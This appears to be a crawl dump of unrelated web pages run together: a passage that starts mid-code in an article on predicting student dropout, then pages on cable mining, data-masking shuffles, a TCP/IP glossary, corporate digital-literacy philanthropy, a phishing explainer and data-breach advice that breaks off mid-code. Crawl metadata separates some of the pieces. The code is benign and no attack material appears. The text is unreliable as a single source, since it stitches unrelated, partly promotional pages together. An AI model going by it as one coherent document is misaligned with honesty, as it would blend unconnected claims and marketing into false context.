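        err = predict(w, b, xi) - yi
        w = [wj - lr * err * xj for wj, xj in zip(w, xi)]
        b -= lr * err

# Flag current students whose predicted dropout probability exceeds 0.5.
current = [[0.92, 0.82, 1.1], [0.45, 0.58, 0.2]]
flagged = [i for i, x in enumerate(current) if predict(w, b, x) > 0.5]
print(flagged)  # -> [1]: only the low-engagement student is flagged
```

An institution would then route the flagged students to advisors or tutoring rather than act on the score alone.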
Examples of Predictive Analytics in Education
If you're thinking predictive analytics in the education sector can wait, or might indeed be ineffective, here are some reasons why you should accept it:
#1 Helps Determine Causes of Absenteeism
Student attendance is one of the biggest factors in determining pay scale and ROIs for students.
With more students missing out on education, institutions can find out the potential cause of less attendance, be it health or financial concerns, and offer special assistance to them.
#2 Encourages Detailed and Personalized Attention
Everyone has their learning and grasping speed or, say, a student’s learning deficit. But you can’t rely on their expressions to know if they understand your course. Guesswork and intuition aren’t taking them to places either. Fortunately, predictive models let you identify kids who need more attention. Now you can deploy certain data metrics to detect their problems even before they arise and arrange special tutorials for better results.
#3 Reduces College Dropouts
The US's dropout rate is at an all-time high of 5.4% for young people aged 16 to 24. While dropping out reduces ROI for students, the resulting unemployment also burdens the working class socially and financially.
Predictive analytics in higher education comes at great use should any department observe a surge in the dropout rate. They can then use the prediction results to promote consistent enrollment in the particular department.
#4 Retains Students Amid Competition
The intense competition is putting educational institutions through immense retaining and development pressure. So it gets crucial for them to improve the graduation rates, enhance the quality of the study, and add visibility to educational progress rather than maximize semester enrollment.
PA helps with students’ retainment and development, pushing them to react to the value offering proactively.
#5 Analyses Student and Staff Feedback
The biggest problem with verbal or paper feedback is that it is often buried under the weight of other opinions. This is where the technology can draw on all online feedback sources and construct them into organized, actionable, and rich data to fine-tune the institution's processes.
Finally, the institutions can also update themselves educationally and financially and work on gaps to provide quality value to the students and an inclusive environment for staff.
#6 Promotes Adaptive Learning
The evolving world needs an adaptive education system. With everything on record, lecturers and teachers can determine teaching gaps and customize their teaching techniques to make themselves heard and understood.
Similarly, predictive analytics in the education sector can exploit data on student learning gaps and push institutes to work on advanced learning experiences and build customized academic modules for individuals. As a result, adaptive learning ultimately offers a richer and informed campus experience.
#7 Motivates Involvement in Physical Activities
Educational institutes have earned the notoriety of ignoring the past achievements in sports and putting students in the wrong places. However, the technology takes historical data into account and helps schools and colleges motivate kids to pursue careers in the same.
You can replicate the same predictive algorithms and models for academics or extracurricular activities as well.
#8 Identifies Latest Educational Trends
Institutions need to identify what works and what doesn’t for them and students. As with any organizational practices, educational practices need ways to assess their teaching methods and their relevance in students’ progress. But these institutions have a hard time evaluating their systems’ efficiency with no particular data in hand.
Fortunately, predictive analytics helps identify the latest efficient trends and review responsiveness in the system. For example, it lets you monitor if online classes are more efficient than traditional classes or which grading system benefits the kids overall.
Once you’ve identified and applied suggested educational trends, you can then analyze ways to improve your teaching structure for the best learning experiences.
Other Uses of Predictive Analytics in Education
- Customized attention to the underprivileged, minorities, and students of color.
- Detailed insights on key performance indicators and relevant suggestions for adaptation.
- Effective decision making at each stage of the education cycle.
- Increased student engagement and graduation rates at school for a secure future.
The Final Argument
Now that you know PA is a critical application of machine learning and artificial intelligence, you can best utilize it through predictive analytics software for higher education, which lets you capture real-time data on student progress and realize all the above-mentioned benefits.
As the education system looks more into optimizing its processes and rescuing at-risk students from the danger of being left out, it’s only a matter of time when AI predictive analytics solutions are acknowledged and deployed by every institution.
We believe educational forecasting is no longer the future: it has already arrived in the form of powerful assessment techniques.
Develop Predictive Analytics Solutions to Improve Student Outcomes
Schedule a call with our AI experts to explore your business and see how we can help.
Most buildings over a few years old have abandoned wires and cables behind the walls. This is especially true for facilities like data centers, schools, hospitals, office buildings and other structures with a prevalence of electronics and telecommunications equipment.
Cables are often abandoned when tenants move out, or when new upgrades are installed, to save time. The accumulated buildup poses numerous issues for property managers and building owners. Removing these wires should be a priority, regardless of how many extra miles of cable you’re sitting on.
What Is Cable Mining?
Abandoned cables include any that are not terminated at both ends or tagged for reuse. Cable mining is the thorough removal of any wires meeting this description.
Effective data center cable mining involves locating, identifying and removing cabling from inside the walls, above ceiling tiles, beneath raised floors and anywhere wiring is tucked away. The materials recovered are then either salvaged for reuse or discarded using the appropriate disposal method.
The Different Types of Wires and Cables
Cable identification is essential. Abandoned cabling often includes wiring from electrical equipment, PBX power cables, Ethernet cables and phone cables. Buildings may also have wiring from security systems, video cameras and fire alarms.
Some of these wires will be live, and others are subject to National Electrical Code (NEC) regulation. Other cables are more prone to issues like rodents and heat. Whoever performs the removal must have a solid grasp of cable identification to avoid potential mishaps.
The Need for Mining Power Cables and Wiring
Cable mining is about more than making aesthetic improvements and lightening the load. Remove your unused and outdated wiring and you’ll gain valuable advantages.
Removing Safety Hazards
Most cables are manufactured for flame resistance and produce minimal smoke. There’s also a lower risk of them becoming energized and directly causing a fire. The real safety risk from abandoned cables comes from the volume that builds up over time.
Even with precautions, a large bundle of abandoned wiring can produce an intolerable amount of thick, heavy and acrid smoke if exposed to open flame. People evacuating the area will have to fight the smoke’s toxic effects and seek clean air as the burning wiring consumes the oxygen supply.
Creating More Space
Abandoned cables take up valuable space. Cable mining lets you reclaim this room, freeing up valuable square inches you can use for:
- Running new wiring: Removing abandoned wiring makes it easier to run new cables, saving time and eliminating challenges.
- Providing ventilation: Cables block airflow, preventing you from achieving the most effective cooling for wires and components.
- Optimizing your design: When you remove your abandoned wiring, you can re-install your live wires in an optimized configuration.
- Simplifying troubleshooting: Keeping your spaces clear of abandoned wires will make it simpler for technicians to troubleshoot faults.
Contact DataSpan for Cable Mining Services
At DataSpan, we have over 40 years of experience providing customized solutions designed to overcome unique IT challenges. We offer a wide range of products and services across all 50 states. Our data center cable mining service will help you gain the most use from your available space and provide a safer work environment.
Fill out our contact form to get started, and we'll get back to you soon.
This algorithm masks by shuffling the values in a particular field or column across different rows. For example, values in the FIRST_NAME column might be shuffled among a number of database rows within a table. It guarantees that each value is moved to a different row, but it will not prevent an input from masking to the same output in cases where the shuffled values are not unique.
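A rotation of the column is one simple way to honor that guarantee: every value lands on a different row, yet duplicate values can still mask to themselves. The sketch below is only an illustration of the described behavior with made-up data, not the product's actual implementation.

```python
import random

def shuffle_mask(values):
    """Sketch of shuffle-style masking: permute a column so that every
    value moves to a different row. Duplicate values may still map an
    input to the same output, as noted above."""
    n = len(values)
    if n < 2:
        # Mirrors the non-conformant case: one value cannot be shuffled.
        raise ValueError("need at least two values to shuffle")
    # A random non-zero rotation offset guarantees every index moves.
    offset = random.randrange(1, n)
    return [values[(i + offset) % n] for i in range(n)]

names = ["Ava", "Ben", "Cara", "Dev"]
masked = shuffle_mask(names)
print(masked)
```

Because the masked column is just a permutation of the original, every original value remains visible somewhere in the table, which is why the caution below about whether shuffling is sufficient obfuscation applies.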
Because shuffling data does not redact or modify the individual data values in any way, careful consideration must be given to whether this form of obfuscation is sufficient to meet your security requirements.
The SecureShuffle algorithm may only be used with masking jobs that support batching, and it will not be presented as an option on the inventory screen when batching is not supported. The maximum number of positions any particular value will be moved within the input is equal to the batch size.
Please refer to the Batch Masking section here for a full description of the Batch Masking mechanism, as well as details on batch size and which jobs support batching.
This algorithm will report non-conformant data whenever only one value is available to mask, meaning that no shuffling is possible.
What is TCP?
TCP stands for Transmission Control Protocol a communications standard that enables application programs and computing devices to exchange messages over a network. It is designed to send packets across the internet and ensure the successful delivery of data and messages over networks.
TCP is one of the basic standards that define the rules of the internet and is included within the standards defined by the Internet Engineering Task Force (IETF). It is one of the most commonly used protocols within digital network communications and ensures end-to-end data delivery.
TCP organizes data so that it can be transmitted between a server and a client. It guarantees the integrity of the data being communicated over a network. Before it transmits data, TCP establishes a connection between a source and its destination, which it ensures remains live until communication begins. It then breaks large amounts of data into smaller packets, while ensuring data integrity is in place throughout the process.
As a result, high-level protocols that need to transmit data all use TCP Protocol. Examples include peer-to-peer sharing methods like File Transfer Protocol (FTP), Secure Shell (SSH), and Telnet. It is also used to send and receive email through Internet Message Access Protocol (IMAP), Post Office Protocol (POP), and Simple Mail Transfer Protocol (SMTP), and for web access through the Hypertext Transfer Protocol (HTTP).
An alternative to TCP is the User Datagram Protocol (UDP), which is used to establish low-latency connections between applications and decrease transmission time. TCP can be an expensive network tool because it retransmits absent or corrupted packets and protects data delivery with controls like acknowledgments, connection startup, and flow control.
UDP does not provide error correction or packet sequencing, nor does it signal a destination before it delivers data, which makes it less reliable but less expensive. As such, it is a good option for time-sensitive situations, such as Domain Name System (DNS) lookups, Voice over Internet Protocol (VoIP), and streaming media.
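The difference is easy to demonstrate with Python's standard socket module. The loopback sketch below sends a single UDP datagram: note there is no connection setup at all, and nothing would report the loss if the packet were dropped.

```python
import socket

def udp_ping(message):
    """Send one fire-and-forget UDP datagram over loopback and read it
    back. No handshake, no acknowledgment, no retransmission."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))            # let the OS pick a free port
    port = srv.getsockname()[1]
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    cli.sendto(message.encode(), ("127.0.0.1", port))  # no connection setup
    data, _ = srv.recvfrom(1024)
    cli.close()
    srv.close()
    return data.decode()
```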
What is IP?
The Internet Protocol (IP) is the method for sending data from one device to another across the internet. Every device has an IP address that uniquely identifies it and enables it to communicate with and exchange data with other devices connected to the internet.
IP is responsible for defining how applications and devices exchange packets of data with each other. It is the principal communications protocol responsible for the formats and rules for exchanging data and messages between computers on a single network or several internet-connected networks. It does this through the Internet Protocol Suite (TCP/IP), a group of communications protocols that are split into four abstraction layers.
IP is the main protocol within the internet layer of the TCP/IP. Its main purpose is to deliver data packets between the source application or device and the destination using methods and structures that place tags, such as address information, within data packets.
TCP vs. IP: What is the Difference?
TCP and IP are separate protocols that work together to ensure data is delivered to its intended destination within a network. IP obtains and defines the address—the IP address—of the application or device the data must be sent to. TCP is then responsible for transporting and routing data through the network architecture and ensuring it gets delivered to the destination application or device that IP has defined.
In other words, the IP address is akin to a phone number assigned to a smartphone. TCP is the computer networking version of the technology used to make the smartphone ring and enable its user to talk to the person who called them. The two protocols are frequently used together and rely on each other for data to have a destination and safely reach it, which is why the process is regularly referred to as TCP/IP.
How Does TCP/IP Work?
The TCP/IP model is the default method of data communication on the Internet. It was developed by the United States Department of Defense to enable the accurate and correct transmission of data between devices. It breaks messages into packets to avoid having to resend the entire message in case it encounters a problem during transmission. Packets are automatically reassembled once they reach their destination. Every packet can take a different route between the source and the destination computer, depending on whether the original route used becomes congested or unavailable.
TCP/IP divides communication tasks into layers that keep the process standardized, without hardware and software providers doing the management themselves. The data packets must pass through four layers before they are received by the destination device, then TCP/IP goes through the layers in reverse order to put the message back into its original format.
As a connection-based protocol, TCP establishes and maintains a connection between applications or devices until they finish exchanging data. It determines how the original message should be broken into packets, numbers and reassembles the packets, and sends them on to other devices on the network, such as routers, security gateways, and switches, then on to their destination. TCP also sends and receives packets from the network layer, handles the transmission of any dropped packets, manages flow control, and ensures all packets reach their destination.
A good example of how this works in practice is when an email is sent using SMTP from an email server. To start the process, the TCP layer in the server divides the message into packets, numbers them, and forwards them to the IP layer, which then transports each packet to the destination email server. When packets arrive, they are handed back to the TCP layer to be reassembled into the original message format and handed back to the email server, which delivers the message to a user’s email inbox.
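The number-and-reassemble step can be mimicked in miniature. The sketch below is purely illustrative (real TCP uses byte-offset sequence numbers in the segment header), but it shows why out-of-order arrival is harmless:

```python
import random

def packetize(message, size=8):
    """Split a message into (sequence_number, chunk) pairs, the way TCP
    numbers segments so the receiver can put them back in order."""
    return [(i, message[i:i + size]) for i in range(0, len(message), size)]

def reassemble(packets):
    """Sort by sequence number and join; out-of-order arrival is harmless."""
    return "".join(chunk for _, chunk in sorted(packets))

msg = "TCP numbers every packet so the receiver can reassemble them"
pkts = packetize(msg)
random.shuffle(pkts)   # simulate packets taking different routes
assert reassemble(pkts) == msg
```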
TCP/IP uses a three-way handshake to establish a connection between a device and a server, which ensures multiple TCP socket connections can be transferred in both directions concurrently. Both the device and server must synchronize and acknowledge packets before communication begins, then they can negotiate, separate, and transfer TCP socket connections.
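A loopback echo in Python shows this in practice: `socket.create_connection()` performs the SYN, SYN-ACK, ACK exchange under the hood, and only after the handshake completes can the two sides exchange application data.

```python
import socket
import threading

def tcp_echo(message):
    """Echo a message over a real TCP connection on loopback. connect()
    triggers the SYN / SYN-ACK / ACK three-way handshake before any
    application data flows."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))           # let the OS pick a free port
    srv.listen(1)                        # ready to accept before the client connects
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()           # handshake completes here
        conn.sendall(conn.recv(1024))    # echo the payload back
        conn.close()

    t = threading.Thread(target=serve)
    t.start()
    cli = socket.create_connection(("127.0.0.1", port))  # SYN -> SYN-ACK -> ACK
    cli.sendall(message.encode())
    reply = cli.recv(1024).decode()
    cli.close()
    t.join()
    srv.close()
    return reply
```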
The 4 Layers of the TCP/IP Model
The TCP/IP model defines how devices should transmit data between them and enables communication over networks and large distances. The model represents how data is exchanged and organized over networks. It is split into four layers, which set the standards for data exchange and represent how data is handled and packaged when being delivered between applications, devices, and servers.
The four layers of the TCP/IP model are as follows:
- Datalink layer: The datalink layer defines how data should be sent, handles the physical act of sending and receiving data, and is responsible for transmitting data between applications or devices on a network. This includes defining how data should be signaled by hardware and other transmission devices on a network, such as a computer’s device driver, an Ethernet cable, a network interface card (NIC), or a wireless network. It is also referred to as the link layer, network access layer, network interface layer, or physical layer and is the combination of the physical and data link layers of the Open Systems Interconnection (OSI) model, which standardizes communications functions on computing and telecommunications systems.
- Internet layer: The internet layer is responsible for sending packets from a network and controlling their movement across a network to ensure they reach their destination. It provides the functions and procedures for transferring data sequences between applications and devices across networks.
- Transport layer: The transport layer is responsible for providing a solid and reliable data connection between the original application or device and its intended destination. This is the level where data is divided into packets and numbered to create a sequence. The transport layer then determines how much data must be sent, where it should be sent to, and at what rate. It ensures that data packets are sent without errors and in sequence and obtains the acknowledgment that the destination device has received the data packets.
- Application layer: The application layer refers to programs that need TCP/IP to help them communicate with each other. This is the level that users typically interact with, such as email systems and messaging platforms. It combines the session, presentation, and application layers of the OSI model.
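One way to picture the four layers working together is encapsulation: each layer wraps the data from the layer above with its own header, and the receiving stack strips those headers off in reverse order. The tags below are stand-ins for real header formats, not actual wire encodings:

```python
def encapsulate(payload: bytes) -> bytes:
    """Toy encapsulation down the TCP/IP stack; 'TCP|', 'IP|', 'ETH|'
    stand in for real transport, internet, and link-layer headers."""
    segment = b"TCP|" + payload   # transport layer: ports, sequence numbers
    packet = b"IP|" + segment     # internet layer: source/destination addresses
    frame = b"ETH|" + packet      # link layer: hardware framing
    return frame

def decapsulate(frame: bytes) -> bytes:
    """The receiving stack strips headers in reverse order."""
    for tag in (b"ETH|", b"IP|", b"TCP|"):
        assert frame.startswith(tag)
        frame = frame[len(tag):]
    return frame
```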
Are Your Data Packets Private Over TCP/IP?
Data packets sent over TCP/IP are not private, which means they can be seen or intercepted. For this reason, it is vital to avoid using public Wi-Fi networks for sending private data and to ensure information is encrypted. One way to encrypt data being shared through TCP/IP is through a virtual private network (VPN).
What is My TCP/IP Address?
A TCP/IP address may be required to configure a network and is most likely required in a local network.
Finding a public IP address is a simple process that can be discovered using various online tools. These tools quickly detect the IP address of the device being used, along with the user’s host IP address, internet service provider (ISP), remote port, and the type of browser, device, and operating system they are using.
Another way to discover the TCP/IP address is through the administration page of a router, which displays the user’s current public IP address, the router’s IP address, subnet mask, and other network information.
How Fortinet Can Help
Fortinet enables organizations to securely share and transmit data through the TCP/IP model with its FortiGate Internet Protocol security (IPsec)/secure sockets layer (SSL) VPN solutions. Fortinet's high-performance, scalable crypto VPNs protect organizations and their users from advanced cyber attacks, such as man-in-the-middle (MITM) attacks, and the threat of data loss while data is in motion at high speed. This is crucial for data being transmitted through TCP/IP, which does not protect data packets while they are in motion.
Fortinet’s VPN solutions secure organizations’ communications across the internet, over multiple networks, and between endpoints. They do this through both IPsec and SSL technologies, using Fortinet FortiASIC hardware acceleration to guarantee high-performance communications and data privacy.
Fortinet’s VPNs mask a user’s IP address and create a private connection for them to share data regardless of the security of the internet connection they are using. They establish secure connections by encrypting the data being transmitted between applications and devices. This eliminates the risk of sensitive data being exposed to third parties while being transferred over TCP/IP, in addition to hiding the users' browsing histories, IP addresses, locations, web activities, and other device information.
What is TCP used for?
TCP enables data to be transferred between applications and devices on a network and is used in the TCP/IP model. It is designed to break down a message, such as an email, into packets of data to ensure the message reaches its destination successfully and as quickly as possible.
What does TCP mean?
TCP, meaning Transmission Control Protocol, is a communications standard for delivering data and messages through networks. TCP is a basic standard that defines the rules of the internet and is a common protocol used to deliver data in digital network communications.
What is TCP and what are its types?
TCP is a protocol or standard used to ensure data is successfully delivered from one application or device to another. TCP is part of the Transmission Control Protocol/Internet Protocol (TCP/IP), which is a suite of protocols originally developed by the U.S. Department of Defense to support the construction of the internet. The TCP/IP model consists of several types of protocols, including TCP and IP, Address Resolution Protocol (ARP), Internet Control Message Protocol (ICMP), Reverse Address Resolution Protocol (RARP), and User Datagram Protocol (UDP).
TCP is the most commonly used of these protocols and accounts for the most traffic used on a TCP/IP network. UDP is an alternative to TCP that does not provide error correction, is less reliable, and has less overhead, which makes it ideal for streaming. | <urn:uuid:08df4ae7-2129-4bd1-a9c6-871ad501b4a0> | CC-MAIN-2022-40 | https://www.fortinet.com/kr/resources/cyberglossary/tcp-ip | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00295.warc.gz | en | 0.930186 | 2,439 | 3.96875 | 4 |
At BMC, we’re committed to making sure that the Autonomous Digital Enterprise—our vision of the future state of business—includes everyone. The key to that is digital literacy, which is a part of our BMC Cares mandate to inspire and empower our workforce to invest in people and enrich communities across the globe and help advance a more equitable world.
As of January 2021, there were 4.66 billion active internet users worldwide, which equates to 59.5 percent of the global population. But online doesn’t necessarily mean digitally literate and increasingly, that’s a must-have to enter the business world. Organizations such as the Lila Poonawalla Foundation (LPF) are working to help improve digital literacy for girls who come from an economically challenged background. BMC is a proud supporter of the India-based nonprofit public charitable trust that promotes education for girls and empowers young women with merit- and need-based scholarships and skill-building and training programs.
Digital literacy and upskilling
Digital illiteracy isn’t exclusive to underdeveloped countries. It’s an issue even in the U.S., a nation with one of the deepest online footprints and richest education systems. According to the recent National Skills Coalition study, The New Landscape of Digital Literacy, 31 percent of U.S. workers across all industries lack digital skills—13 percent say they have no skills and 18 percent say they have limited skills.
Digital literacy is integral not just for getting good jobs, but also maximizing earning potential once you’re in the door. The study found that 57 percent of workers with no digital skills are in the lowest half of earnings, and 47 percent with limited skills fall into that category.
Building digital literacy includes developing “hard” and “soft” skills—or upskilling—to grow the next-generation workforce for our global economy. In an article for the 2020 World Economic Forum Annual Meeting, PwC global chairman Robert E. Moritz explained upskilling this way, “For some, upskilling means learning how to code and leveraging and scaling technologies. For others, it’s about understanding what technology can do and how it can drive innovation. It’s also about much more than hard skills like learning new digital tools and competencies. The soft skills—leadership, adaptability, how to translate feedback into measurable change—are what make the short-term skills training more long-lasting and transformative.”
A recent World Economic Forum report in collaboration with PwC, Upskilling for Shared Prosperity, added transferable skills such as critical thinking, creativity, and self-management to that list. The report found that if skills gaps are closed by 2028, it would add $6.5 trillion to the global GDP by 2030, and if the gaps were closed by 2030, it would add $5 trillion by that same year. The report also estimates upskilling could create 5.3 million net new jobs globally.
Opportunities for growth in India
India has a vast online population of approximately 560 million users, yet the most recent National Family Health Survey found that over 60 percent of women in 12 states and Union territories have never used the internet. And that’s despite 48 to 90 percent of women owning a mobile phone, which reinforces the idea that access to technology doesn’t equate to the ability to use it.
That inequality for Indian women extends to the white-collar workforce, too. According to the United Nations Development Program’s Human Development Indicators, just 26.9 percent of women enrolled in university are focused on science, technology, engineering, and math programs, and only 20 percent of women participate in the organized labor force while 76 percent are informally employed in roles that are manual, low-paying, and offer little to no benefits or opportunities for growth.
Becoming a steward for change
The Lila Poonawalla Foundation (LPF) is working to correct that. Since its inception in 1995 by Mrs. Lila Poonawalla (recipient of the Padma Shri in 1989) and Mr. Firoz Poonawalla, LPF has transformed the lives of over 10,900 girls and their 75,000-plus family members. BMC has been a proud corporate partner of the foundation since 2014, supporting girls age 17 to 22 from families with incomes less than USD $4,500 who are pursuing a Bachelor of Engineering degree. The scholarships cover tuition, housing, books, and ancillary costs.
LPF teaches essential, technical, and functional skills and gives ample exposure to its scholarship awardees in a range of industries. LPF also assists its girls with internships and placement opportunities, so they can pursue the professional career of their choice. Over 98 percent of the girls enrolled in the program complete their courses, with 95 percent participating in at least three skill-building and training programs annually. Over 65 percent of the program’s graduates secure jobs within the first year of course completion, with an average 15 to 20 percent pursuing post-graduate education and 5 percent pursuing a career in the civil services.
Over 63 girls have been sponsored by BMC, and we are currently employing four program graduates. This year, BMC India donated 50 refurbished laptops and is sponsoring 12 students.
By fostering digital literacy and supporting groups like the Lila Poonawalla Foundation, and others striving to bridge the digital literacy gap (Fundacion Llamada Solidaria, Raspberry Pi Foundation, Black Girls Code, Learning Equality, TechBridge Girls and Nexleaf), we all have the power to invest in the women who will become the technology and business professionals and leaders of tomorrow. | <urn:uuid:09232eb1-b479-4231-88aa-32ec60069879> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/digital-literacy-upskilling/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00295.warc.gz | en | 0.942927 | 1,184 | 2.78125 | 3 |
Phishing refers to any attempt to obtain sensitive information such as usernames, passwords, or banking details, often for malicious reasons, by impersonating a trustworthy entity in an electronic communication. Phishing is an example of a social engineering technique used to mislead users and exploit weaknesses in network security. Various attempts have been made to control the increase in reported phishing cases, including legislation, employee and general user training, public education, and standardized network security protocols.
Phishing is typically carried out by direct digital communication. An attack will often direct users to enter sensitive information at a fake website whose look and feel match the legitimate site. Correspondence claiming to originate from social media, auction or retail sites, financial institutions, or network and IT administrators is used to trap users. Phishing emails may even contain links that distribute malware, further damaging a victim’s system.
In addition to standard phishing techniques, specific types of phishing can be used to accomplish various objectives.
- Spear phishing: An email-spoofing attack that targets a specific organization or individual, seeking unauthorized access to sensitive information. Attackers usually gather personal information about the intended target to increase their chance of success.
- Clone phishing: An attack in which an authentic, previously delivered email has its content and recipient address stolen and reverse engineered to create an identical, or cloned, email. Any real attachments or links in the original email are replaced with malicious software, and the clone is then sent from a spoofed email address to trick the victim into believing its authenticity.
- Whaling: A phishing attack crafted to target an upper manager based on the person's role in the company. The content of a whaling attack email is often written as a legal subpoena, customer complaint, or executive issue. Whaling scam emails are designed to masquerade as a critical business email, sent from a legitimate business authority.
Common Features of Phishing Emails
When dealing with web security, it's important to be able to recognize the most common aspects of a phishing attack. Users are often the only reason that phishing attacks are successful, so avoiding major pitfalls can help businesses avoid cyber security threats.
- Dramatic Statements: Lucrative offers and eye-catching or attention-grabbing statements are designed to attract people’s attention immediately. For instance, many claim that a target won a phone, a lottery, or some other lavish prize.
- Urgency: A common tactic among cybercriminals is to ask the victim to act quickly before an opportunity ends. Most reliable organizations give ample time before they terminate an account, and they never informally ask their users to update personal details over the internet.
- Hyperlinks: A link may not be all it appears to be. Hovering over a link shows the actual URL, and it could be totally unrelated to the link text. Sometimes it might appear to be a safe website, but with slightly altered spelling – for example, with the number “1” replacing a lowercase “L”.
- Attachments: Unexpected attachments in emails should be treated with suspicion. They often contain payloads like ransomware or other viruses.
- Unusual Sender: Low-level spam is often sent from unknown or suspicious-sounding addresses. When you receive an email from someone unknown who seems to be acting suspiciously, exercise restraint before responding, if you respond at all.
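The look-alike URL trick, such as a "1" standing in for a lowercase "l", can be caught with a simple normalization heuristic. The check below is a toy illustration, nowhere near a production phishing filter:

```python
def looks_like(domain, trusted):
    """Toy homoglyph check: does `domain` reduce to `trusted` after
    undoing common character substitutions? Not a real phishing filter."""
    swaps = {"1": "l", "0": "o", "rn": "m", "vv": "w"}
    normalized = domain.lower()
    for fake, real in swaps.items():
        normalized = normalized.replace(fake, real)
    return normalized == trusted.lower() and domain.lower() != trusted.lower()
```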
Avoiding Phishing Attacks
- Social Responses: Training people to recognize phishing attempts, and deal with them. Education can be effective, especially where training emphasizes conceptual knowledge.
- Browser Alerts: Maintain a list of known phishing sites and check websites against the list. One such service is the Safe Browsing service provided by Google Chrome.
- Eliminating Phishing Mail: Specialized spam filters that reduce the number of phishing emails that reach their addressees' inboxes, or provide post-delivery remediation, analyzing and removing phishing attacks upon delivery through email provider-level integration.
- Monitoring and Takedown: Round-the-clock services to monitor, analyze and assist in shutting down phishing websites.
- Transaction Verification and Signing: Using a mobile phone (smartphone) or alternate email address as a backup channel for authentication and authorization of sensitive interactions (like financial transactions).
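At its core, the browser-alert approach is a blocklist lookup on the URL's hostname, as in the sketch below. The listed domains are made up for illustration; real services like Google Safe Browsing use far larger, constantly updated lists:

```python
from urllib.parse import urlparse

PHISHING_BLOCKLIST = {"paypa1.com", "faceb00k-login.net"}  # made-up example entries

def is_blocked(url):
    """Check a URL's hostname against a list of known phishing domains —
    the core of what browser safe-browsing warnings do."""
    host = (urlparse(url).hostname or "").lower()
    return host in PHISHING_BLOCKLIST
```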
Phishing is one of the largest threats to enterprises today. A successful phishing attack can not only cost money, it can open a company up to much greater security and data breaches. That is why training and education are so important, as they can greatly reduce the rate of successful phishing attacks.
- Blog: Four big spear phishing attacks you may have forgotten
- Blog: Phishing vs. Spear Phishing: What You Need to Know
- Blog: Is spear phishing the new ransomware?
- Whitepaper: Best Practices for Protecting Against Phishing, Ransomware and Email Fraud
How Barracuda Can Help
Barracuda Email Protection is a comprehensive, easy-to-use email security solution that delivers gateway defense, API-based impersonation and phishing protection, incident response, data protection, compliance and user awareness training. Its capabilities can prevent phishing attacks:
Barracuda Email Gateway Defense quickly filters and sanitizes every email before it is delivered to your mail server to protect you from email-borne threats. Using virus scanning, spam scoring, real-time intent analysis, URL link protection, reputation checks, and other techniques, Barracuda provides you with the best possible level of protection.
Barracuda Impersonation Protection protects against business email compromise, account takeover, spear phishing, and other cyber fraud. It combines artificial intelligence and deep integration with Microsoft Office 365 into a comprehensive cloud-based solution.
Impersonation Protection’s unique API-based architecture lets the AI engine study historical email and learn users’ unique communication patterns. It blocks phishing attacks that harvest credentials and lead to account takeover, and enables real-time remediation.
Barracuda Security Awareness Training is an email security awareness and phishing simulation solution designed to protect your organization against targeted phishing attacks. Security Awareness Training trains employees to understand the latest social engineering phishing techniques, recognize subtle phishing clues, and prevent email fraud, data loss, and brand damage. Security Awareness Training transforms employees from a potential email security risk to a powerful line of defense against damaging phishing attacks.
Barracuda Incident Response automates incident response and provides remediation options to address issues faster and more efficiently. Admins can send alerts to impacted users and quarantine malicious email directly from their inboxes with a couple of clicks. Discovery and threat insights provided by the Incident Response platform help to identify anomalies in delivered email, providing more proactive ways to detect email threats.
Data breaches have become a part of life. These attacks occur every week, targeting individuals, small businesses, large corporations, governments, and the military. A data breach is a type of cyberattack where information is stolen and/or exposed. This data can include sensitive or proprietary information such as a company’s trade secrets or customer data such as credit cards.
A recent breach targeted Verizon-owned digital carrier Visible, resulting in the theft of customer account information and unauthorized changes to accounts. The hackers also purchased new smartphones using the credentials they stole. Tap or click here to check out our report.
The fact that breaches are more common and threatening doesn’t mean we should be complacent. There are steps you can take to reduce your risks. And if you are a victim of a breach, you can mitigate the damage with some quick action. Here’s how.
1. Know what information was exposed
Have you received an email regarding a breach from a company you do business with? The type of data that was stolen is crucial. While it’s not ideal to have your name, email address and other personal information compromised, it could be worse. Sensitive information such as credit card and Social Security numbers could truly lead to serious trouble.
Even if you weren’t notified that a company you do business with was breached, you should check to be sure. A company might not become aware of the breach for some time and even when it does, it could take a while to figure out the details.
Resources like Have I Been Pwned can help you see if there are any hits. The site keeps a record of data breaches and has more than 11 billion stolen records in its database.
Just go to haveibeenpwned.com and enter your email address in the search bar. Hit the pwned? button, and the website will get to work alerting you of any data breaches you may be part of. Tap or click here for more information on this helpful site.
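The site's companion Pwned Passwords service exposes a k-anonymity API: only the first five hex characters of the password's SHA-1 hash are ever sent, and the 35-character suffix is matched locally against the response, so the full hash never leaves your machine. A sketch of the client-side preparation (the network call itself is omitted):

```python
import hashlib

def pwned_range_query(password):
    """Prepare a k-anonymity lookup for the Pwned Passwords API: only the
    first 5 hex characters of the SHA-1 hash are sent; the 35-character
    suffix is matched locally against the returned list."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]

# Usage: GET https://api.pwnedpasswords.com/range/<prefix>, then search
# the returned suffix list for <suffix> to see if the password leaked.
```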
2. Change your password(s)
First things first — change your login credentials for the breached company immediately. Hopefully, you’re not using the same password for other accounts, as this is terrible practice with or without a breach. If you were doing this, change those other passwords, but don’t make the same mistake.
Many browsers keep track of your hacked passwords. For example, Chrome’s Password Manager has a Password Checkup feature. It reviews your passwords for strength and tells you if any have been compromised. Go to passwords.google.com and click Go to Password Checkup, then Check Passwords.
Firefox, Edge and Safari have similar tools. Tap or click here for instructions on how they work and how to access them.
A strong password is not enough. Two-factor authentication adds another layer of security to your accounts. This consists of something you only know (such as an answer to a question), something you have (your smartphone) or something that identifies you as a person (fingerprint, voice pattern or facial scan).
Without these identifiers, others won’t be able to get into your accounts. Make sure to have 2FA enabled when available, especially on the breached account.
Authenticator apps automate the 2FA process and make it even more secure. They generate one-time passcodes that expire after a short time. The app is unique to your phone, and you don’t need to hand out your phone number. Tap or click here for more on authenticator apps.
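The codes these apps generate follow RFC 6238 (TOTP): an HMAC-SHA1 over a 30-second time counter, dynamically truncated to six digits. A minimal standard-library implementation:

```python
import base64
import hashlib
import hmac
import struct
import time

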